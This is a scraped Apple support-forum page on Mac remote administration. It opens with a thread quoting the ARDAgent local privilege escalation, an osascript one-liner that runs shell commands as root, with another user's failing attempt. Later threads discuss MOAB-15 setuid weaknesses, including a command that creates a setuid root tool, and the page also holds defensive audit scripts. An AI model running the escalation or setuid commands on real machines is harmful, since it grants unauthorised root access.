Local Privilege Escalation via ARD

Slashdot has an interesting topic...
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
Will print "root" and indeed evil things can be done by replacing
"whoami" with a suitable command.
The ARDAgent executable is suid'ed to root!
Jerry

Still no worky for me
(spartan) ~ % bash
bash-3.2$ while : ; do osascript -e 'tell application "ARDAgent" to do shell script "id"'; done
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
31:51: execution error: ARDAgent got an error: "id" doesn’t understand the do shell script message. (-1708)
...

Similar Messages

  • Mac OS X Local Privilege Escalation Vulnerabilities

    Yes this has happened to me
    I found out about it on this site:
    http://projects.info-pull.com/moab/MOAB-15-01-2007.html
    It affects Disk Utility.
    If you have the below when you check your disk permissions:
    Determining correct file permissions.
    Group differs on ./Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool, should be 80, group is 0
    Group differs on ./Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy, should be 80, group is 0
    Group differs on ./Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool, should be 80, group is 0
    There is a workaround but I am not sure if I know how to do it. Can anyone write me a step-by-step guide, i.e. open Terminal, cd into so-and-so, that sort of thing. Also, is their workaround sound, or are there just some other vulnerabilities?
    Please check out the link before answering.
    Thanks in advance
    PS Am I worried no not really we can only learn from these things

    This "exploit" or whatever you want to call it is absolutely ridiculous, in my opinion.
    "Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation. A malicious user can overwrite the binaries and perform a disk permissions repair operation via the diskutil tool, effectively setting back the default ownership and permissions (root setuid)."
    The file at "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool" is indeed a SetUID root helper tool which the Activity Monitor uses. Its owner is root, with a group of admin. Its parent folder is owned by root with a group of admin.
    A "Standard" non-privileged user, or in other words, a user for whom the "Allow user to administer this computer" checkbox isn't checked in System Preferences, cannot do anything to alter the pmTool. When that checkbox is enabled, the user is part of the "admin" group. Since the pmTool is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user can do nothing to alter it. Since the parent directory, /Applications/Utilities/Activity Monitor.app/Contents/Resources/, is only writable by its owner "root", or by a user who's part of the "admin" group, a standard user cannot remove, add, or replace the contents, including the "pmTool".
    So what's left of this "exploit" is that a user that's an administrator could replace or modify the pmTool and use Disk Utility's Repair Permissions feature to "blindly" turn this malicious replacement executable into a SetUID root tool. They could then use this tool to wreak havoc on the system.
    My only comments are:
    1) Duh.
    2) Why the heck would you want to go through this convoluted procedure just to create a (malicious?) SetUID root executable? If you're an admin, there are much simpler methods available.
    If a user is an administrator, all they need to do to create a SetUID root tool is enter the following in the Terminal:
    sudo chmod 4755 /Users/mdouma46/Desktop/myMaliciousSetUIDTool; sudo chown 0:0 /Users/mdouma46/Desktop/myMaliciousSetUIDTool
    Just as effective, without all the convoluted "pseudo-exploit" stuff.
    So, where exactly is the exploit now?
    Dual 2.7GHz PowerPC G5 w/ 2.5 GB RAM; 17" MacBook Pro w/ 2 GB RAM -   Mac OS X (10.4.8)  
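    The ARDAgent thread at the top of the page and the MOAB-15 discussion above come down to the same audit question: which setuid executables exist on the box, and which of them can be modified by someone other than root (a setuid binary that its group can write is a root shell waiting for a permissions repair). The script below is an added example, not code from either thread and not an Apple tool; it assumes only POSIX find and ls, and it defaults to /Applications, the tree the MOAB advisory names.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid executables and flag the
# ones writable by group or others. Not from the thread; assumes POSIX find/ls.
# ASSUMPTION: the default tree is /Applications, as in the MOAB-15 advisory.

# List every regular file under $1 that has the setuid bit set.
list_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Among setuid files under $1, list those that are also writable by the
# group or by others: anyone with that write access can replace the file's
# contents, and the setuid bit then runs the replacement as the file's owner.
list_setuid_writable() {
    find "$1" -type f -perm -4000 \( -perm -020 -o -perm -002 \) 2>/dev/null
}

# Count lines without the leading spaces BSD wc prints.
count_lines() {
    wc -l | tr -d ' '
}

# Human-readable summary: totals, then ls -l of every risky file so the
# owner and group that grant the write access are visible.
report() {
    dir=${1:-/Applications}
    total=$(list_setuid "$dir" | count_lines)
    risky=$(list_setuid_writable "$dir" | count_lines)
    printf 'setuid files under %s: %s\n' "$dir" "$total"
    printf 'setuid files also writable by group or others: %s\n' "$risky"
    list_setuid_writable "$dir" | while IFS= read -r f; do
        ls -l "$f"
    done
}

# Usage: sh setuid_audit.sh --report [directory]
case "${1:-}" in
    --report) report "${2:-/Applications}" ;;
esac
```

Run it as root so find can descend into every bundle; on a stock system the risky list should be empty, and any entry in it is exactly the condition the MOAB post describes (setuid root, writable by the admin group), regardless of whether Disk Utility would later "repair" it.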

  • AUDIT action (create, delete, privilege escalation, set and change password from users account and group) users and admins in Solaris 10

    Hello.
    In Solaris 10 I need auditing of create, delete, privilege escalation, set and change password, etc. for user accounts and groups.
    I set settings:
    in file syslog.conf:
    *.info;mail.none;cron.none;audit.notice            @IP-Remote-syslog-server-SIEM
    in file   /etc/security/audit_control:
    dir:/var/audit
    flags:lo,ad,ex,cc,am,no,fc,fd
    minfree:20
    naflags:lo
    plugin:name=audit_syslog.so;p_flags=lo,ad,ex,cc,am,no
    in file   /etc/security/audit_user:
    root:lo,ad:no
    Now I see in the logs only the fact of a connection via SSH and processes run on behalf of users. Creation and deletion of users and password changes for some reason are not logged.
    There are many users. Writing permissions for each individual in the file /etc/security/audit_user is not possible; it is likely that a new user will be forgotten (or is there a possibility to describe the audit for all accounts with one line in this file?).
    Where is the mistake?

    You are most likely hitting Bug 15779000 user/role/groupadd/mod/del don't audit their use.
    And the fix is only available in S11.2.
    -- Renaud

  • Root vs. admin softwareupdate via ARD 2.0

    Hello,
    I've searched here and have not been able to find a similar post. I have an office of about 25 Tiger clients (10.4.6) which get their directory information via LDAP from a Tiger server(10.4.6). If I run softwareupdate from the GUI as an admin account or even from the command line as admin, softwareupdate looks to the local server, which is running the softwareupdate service. If, however, I run softwareupdate as root (which I have to do via ARD, from what I can tell) it checks Apple's servers and wants to download from them. This is a source of frustration because I don't want to have to visit every machine, nor do I prefer to download updates on my admin machine and then push the package out with ARD.
    I'm wondering if using softwareupdate via root is designed to work this way, or if it's a bug. If it's a bug, I'll report it to Apple.
    If this has happened to any of you, please respond with your solution.
    By the way, if I send this command:
    sudo -u admin softwareupdate -i -a
    via ARD as root user, I am prompted for a password, which I'm not sure how to enter. The task just fails.
    Thanks in advance!
    Sean

    It sounds like your group is pushing out Workgroup Management (MCX) from your MacOS X Server box, specifically they are setting the Software Update server. But it sounds like they are setting this as a policy based on groups, rather than on computers. So since root is not in any of the groups managed by the MCX settings, when you run Software Update it is not set, and is defaulting to the built-in address.
    If you really wanted to do it without making changes (if they don't want to put that in for "guest" computers and every other one), then you could use:
    defaults write /Library/Preferences/com.apple.SoftwareUpdate CatalogURL http://your.softwareupdateserver.com:8088/
    note that that last goes all on one line, and is taken from afp548.com.

  • Adobe Reader XI privilege escalation

    ...I know, this is not really a privilege escalation in the classical way...
    Hi.
    With both the current versions of Adobe Reader X and XI, standard users are able to repair adobe reader going via appwiz.cpl/control panel.
    Problem is: if reader is opened, Windows needs to restart to finish repairing...problem is, even if standard users are NOT allowed to restart the computer (think of terminal servers with dozens of clients logged on), they MAY restart the server, causing real trouble. So even with GPOs in place that deny standard users the privilege to shutdown/restart the computer, buggy Adobe Reader makes it possible.
    Side note: while UAC will prompt users to supply admin credentials when trying to uninstall Adobe Reader, it does not prompt when trying to repair. That's the bug.
    Tested on win8/server 2012, Server 2008 R2. Adobe Reader 11.0.3/10.1.7

    http://www.adobe.com/devnet/reader.html
    You may want to check with the dev people about the shutdown and how to disable it, this being a user-to-user forum, and not often frequented by development personnel. I'm sure there's a simple code change that will disable it; however, without the restart, the repair becomes useless as Reader cannot reopen until the proper reg keys and dll files are amended per the repair, but then you already know that.
    There may also be a code change to enable UAC for repairs. My understanding is that an uninstall may remove shared files, and that's the parameter for Windows to prompt with UAC. but the repair only changes installed files using existing files, so Windows doesn't see that as a potential for damage.

  • Rename client computer via ARD and Automator

    Does anyone know of a method or action to rename (Computer name) Macs using AppleRemoteDesktop and Automator?
    I have over 700 laptops on a school network that I would like to rename based on a tab-delimited text file containing all the MAC (Ethernet) addresses and the associated user.
    I have tried sending a unix script and the text file via ARD to change the computer name via scutil, but it doesn't work consistently.

    You should be able to use AppleRemoteDesktop to rename the remote computer. Once you are connected to the remote computer, just go to "System Preferences...", and click on "Network" and change the computer name.
    If you are a non-administrator of ARD, you may need to turn on the access privilege to rename the remote computer. Go to "Preferences..." in ARD, and click on "Security" button, and turn the access privileges on.

  • I need help, How could I add Aliases to Local Administrator account via terminal commands???

    I need help, How could I add Aliases to Local Administrator account via terminal commands???
    I want to use commands to add alias for existing administrator account remotly by using ARD.
    Thanks.

    Hi,
    a Windows Domain Controller does not have any local user or groups. So you might add the user to the admin group at Domain level.
    B RGDS,
    Gregor
    Edited by: Gregor Gasper on Jan 9, 2009 1:44 PM

  • Trouble accessing a remote machine via ARD over a VPN

    Hi There,
    I'm having trouble accessing a remote Workstation via ARD over a VPN.
    The VPN is set up and I can:
    - Control our 10.6 server via ARD remotely
    - Mount volumes from the 10.6 server remotely
    - Access another server (we run an accounting server) remotely
    But we can't access a Workstation using ARD.
    I can connect to the Workstation when in the office, so I assume it's configured for access. I guess I suspect the issue lies with the Firewall on the 10.6 server and/or the Netgear FSV366G Firewall.
    The VPN is set up on the 10.6 server, so I figure it's something to do with Snow Leopard server?
    I'm just not sure how to narrow things down and fix the issue; although I set up the server I'm not super Unix savvy.
    Any help or pointers in the right direction would be much appreciated.
    Cheers
    Ben

    I can't say for certain what is going wrong in your case but I can confirm it is possible to do an ARD connection i.e. Screen Sharing to a remote user connected via a VPN. The way we do this is to get the user to connect to the VPN server (a Mac OS X Server), then on the Mac OS X Server in Server Admin see what IP address they have been allocated by the VPN server, then tell ARD Admin to connect to that IP address.
    This works fine for me.
    The IP address will be one that is 'local' to the ARD and VPN machines; it would not be the remote public or private IP address.

  • Deploying AppleMail settings via ARD - is it possible?

    Hello,
    I want to set AppleMail settings for about 50 Users via ARD.
    First of all IMAP settings, next account details based on the local non-admin user.
    Any idea?
    Thanks a lot!
    Jochen

    ARD can't do this directly, but you can send an OSA script to do this. Here is one I use. You send a UNIX command:
    osascript -e 'tell application "System Events"' -e 'keystroke "q" using command down' -e 'end tell'
    You can string together commands by using -e. This comes in really useful for product serial numbers, for instance:
    osascript -e 'tell application "System Events"' -e 'keystroke "Company Name"' -e 'keystroke tab' -e 'keystroke "Company Location"' -e 'keystroke tab' -e 'delay 2' -e 'keystroke "REALLY long pointless serial number"' -e 'delay 2' -e 'keystroke return' -e 'end tell'
    In this example, "delay 2" means wait two seconds. Older systems / apps will actually have an issue with receiving the keystrokes too fast, and do nothing. Quark is the worst offender here, and I need to run a delay of 5 seconds, even on Mac Pros.
    I also use it for logging in a bunch of systems as a maintenance user. I will log out everyone, and then issue:
    osascript -e 'tell application "System Events"' -e 'keystroke "Service User"' -e 'keystroke tab' -e 'delay 2' -e 'keystroke "myPasswordHere"' -e 'delay 2' -e 'keystroke return' -e 'keystroke return' -e 'end tell'
    You will notice here that you need to hit enter twice... This is a bug in the login system. 50% of your systems will not continue with hitting enter only once in script (although they work perfectly fine hitting enter once at the keyboard).
    Hope this helps.

  • How can I 'login' as a different user via ARD?

    It has been too many years and I cannot remember much of anything anymore...
    My main computer is running the ARD admin app. I have a 'server' that has the
    client software installed and setup to auto login to my admin account on the 'server'.
    I can easily connect to the server using ARD... however I would like to connect
    as a different user ( the postgresql admin account).
    Is it possible to do this via the ARD software?
    If I log out on my main admin account on the server while connected via ARD
    then the remote desktop software on my main
    computer reports that ARD is no longer active on the server client and I cannot access
    the server via ARD without rebooting the server.
    The help menu in ARD gives an Applescript that supposedly will allow a login from
    the clients login screen but I don't seem to recall how to setup the client so
    that one can access the server if the login screen is up...
    I am running the latest everything...
    In short: Can I use ARD to connect as different users on a client machine? (if so, how?)
    Thanks
    Jerry

    Ok,
    Never mind...
    I enabled postgres in the sharing panel.
    When I log out I get the login screen and I can directly
    login to the postgres account via ARD.
    Thanks
    Jerry

  • I am unable to connect to my RackSpace Windows Server via ARD. I have added a computer entering the ip address, username, and password but I can't establish a connection. Am I missing a setting or a step that is different in ARD?

    I am unable to connect to my RackSpace Windows Server via ARD. I have added a computer entering the ip address, username, and password but I can't establish a connection. Am I missing a setting or a step that is different in ARD?

    ARD only works with Windows computers if the Windows computer is running VNC server software.  Even then it can only control and observe.  Do you have this installed?

  • Pushing out a script to run via ARD

    I have the following script I am running into two issues with
    1)  Instead of running it as root, can we run as a member of the admin group.
    2)  Can this be pushed out via ARD?
    #!/bin/bash
    #This script needs to run as root
    ROOT_UID=0
    if [[ $UID -ne $ROOT_UID ]]; then
    echo "YOU MUST BE ROOT TO RUN THIS SCRIPT"
    exit 1
    fi
    OLD="<string>The owner or any administrator can unlock the screensaver.<\/string>"
    NEW="<string>(Use SecurityAgent.) The owner or any administrator can unlock the screensaver.<\/string>"
    cp /private/etc/authorization /tmp/auth.tmp
    sed "s/$OLD/$NEW/" /tmp/auth.tmp > /tmp/authorization
    mv /private/etc/authorization /private/etc/authorization.previous
    mv /tmp/authorization /private/etc/authorization
    rm /tmp/auth.tmp

    Do not remove the "root user reference" from the script. Without "the reference" the script will place a modified authorization file in the /tmp directory. To modify the /private/etc/authorization file you must be root or an admin user with the proper authorization (You would use sudo in the shell environment). Here's a safer and cleaner version of that script->
    #!/bin/bash
    OLD="<string>The owner or any administrator can unlock the screensaver.<\/string>"
    NEW="<string>(Use SecurityAgent.) The owner or any administrator can unlock the screensaver.<\/string>"
    # use sed to make a backup of the original file then edit the file in place
    /usr/bin/sed -i.previous "s/$OLD/$NEW/" /private/etc/authorization
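    Both versions of the script above share one blind spot: sed exits 0 whether or not the pattern ever matched, so a script pushed out via ARD can report success on a machine where nothing changed (or where the line had already been rewritten). The script below is an added example, not code from either poster; it keeps the thread's root check, backup and in-place edit, but verifies the result before committing it and leaves the original in place otherwise. It assumes the target file is passed as an argument and uses the thread's OLD/NEW strings; the path /private/etc/authorization is the one the thread names.

```shell
#!/bin/sh
# Added example (not from the thread): edit one line of a config file with
# a backup, verify the edit actually happened, and restore the original
# if it did not. Assumes the file path is given as an argument.
# The strings below are the ones from the thread; "|" is used as the sed
# delimiter so the "/" in </string> needs no escaping.

OLD_TEXT='<string>The owner or any administrator can unlock the screensaver.</string>'
NEW_TEXT='<string>(Use SecurityAgent.) The owner or any administrator can unlock the screensaver.</string>'

# True when $1 already carries the replacement text.
has_new() {
    grep -q -F "$NEW_TEXT" "$1"
}

# Edit $1 in place, keeping a copy as $1.previous. Return codes:
#   0  edit applied and verified
#   2  original text not present (already patched or wrong file); untouched
#   3  sed failed or the result did not verify; original restored
patch_authorization() {
    f=$1
    # Fixed-string check first: sed alone cannot tell "no match" from success.
    if ! grep -q -F "$OLD_TEXT" "$f"; then
        return 2
    fi
    cp -p "$f" "$f.previous" || return 3
    if sed "s|$OLD_TEXT|$NEW_TEXT|" "$f.previous" > "$f.tmp" && has_new "$f.tmp"; then
        mv "$f.tmp" "$f"
        return 0
    fi
    # Verification failed: discard the partial output and put the original back.
    rm -f "$f.tmp"
    cp -p "$f.previous" "$f"
    return 3
}

# Entry point when run on a client, e.g. pushed via ARD as root:
#   sh patch_auth.sh --run
main() {
    [ "$(id -u)" -eq 0 ] || { echo "YOU MUST BE ROOT TO RUN THIS SCRIPT" >&2; exit 1; }
    patch_authorization /private/etc/authorization
}

case "${1:-}" in
    --run) main ;;
esac
```

The exit code is what makes this usable across 300 machines: ARD shows a non-zero status per client, so "already patched" (2) and "left unchanged because the edit could not be verified" (3) are distinguishable from a real success without logging in to each one. On OS X 10.9 and later the rights live in the authorization database rather than in /etc/authorization, so this file-based approach applies only to the Tiger-era systems the thread is about.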

  • Unix command to update Microsoft Office 2008 via ARD

    I'm looking for a unix command I can send via ARD to update Microsoft Office 2008. It just needs to install all updates and then restart. Kinda like apple's software update one: softwareupdate -i -a; shutdown -r now

    Why go through all the trouble of trying to do it in Unix.  Apple and Microsoft made it a LOT easier.
    Just download the update from Mactopia
    Open the .dmg
    (for convenience and the ability to have it stored) Drag the Update from the Microsoft folder that opens up and put the update on your desktop
    In ARD Select what computer(s) you want to install the update in
    Use ARD Install function to install the update
    Go have a cup of coffee and a donut while ARD does the install.
    You do not even have to do a restart.  Microsoft uses a different icon for the update but it still is a package file operation.

  • Adobe apps fail to launch after copying via ARD 3

    For several years we have been updating our Adobe apps by updating our master image and copying (via ARD v.1, then v.2, now v.3) the applications and the associated Application Support files to the target machines (300 Macs running Tiger). Since upgrading to version 3 of ARD, Adobe apps fail to launch after they are replaced, even with the old files.
    I found a post alluding to a known issue with Acrobat from June. It stated it was a known bug that engineering was aware of. THAT was the only mention I could find. Does anyone know anything more about this? This is critical for our publishing workflow - Adobe has two updates that affect us in critical areas that we need to implement, but are reluctant to visit 300 individual desktops (even remotely) and run individual install patches.
    The silent install works great for installation, but does not address updates.
    Anyone?
    Mac OS X (10.4.7)

    Just FYI. I only had problems with InDesign not launching but this was a known issue with Adobe:
    http://www.adobe.com/support/techdocs/331578.html
